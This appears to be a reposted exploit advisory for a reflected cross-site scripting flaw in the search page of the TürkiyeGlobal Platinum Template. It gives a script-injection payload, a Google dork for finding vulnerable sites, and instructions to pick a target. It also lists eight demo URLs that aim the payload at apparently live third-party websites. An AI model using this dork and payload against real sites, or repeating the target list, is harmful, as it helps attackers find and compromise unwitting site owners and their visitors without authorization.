TrkiyeGlobal Platinum Template Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>TürkiyeGlobal Platinum Template Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : TürkiyeGlobal Platinum Template Cross Site Scripting # Exploit Author : Darkcrew.Org # Vendor Homepage : http://www.turkiyeglobal.com/ # Google Dork : intext:"Copyright © 2016 Turkiye Global Inc." # Date: 06.07.2016 # Contact: sultan.ahmir1997@yandex.com ###################### # Vulnerable File : /search.php?q= # Payload : "/></script><script>alert(/MirSultan/)</script> # Describe : Search dork and select Target. Put /search.php?q= After url such as : # http://site.com/search.php?q= # Send data(Payload) with post method ... Ok # # Demo : # http://www.bjkden.com/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.6n1k.com.tr/search.php?q="/</script><script>alert(/MirSultan/)</script> # http://www.ozelguvenlikhaklari.org/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.cide.gen.tr/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.kent16.com/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.memurmaasmutemeti.com/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.habermarmara.com.tr/search.php?q="/></script><script>alert(/MirSultan/)</script> # http://www.mirachaber.com/search.php?q="/></script><script>alert(/MirSultan/)</script> # ###################### # discovered by : Batur-ı Mir Sultan ###################### </BODY></HTML>
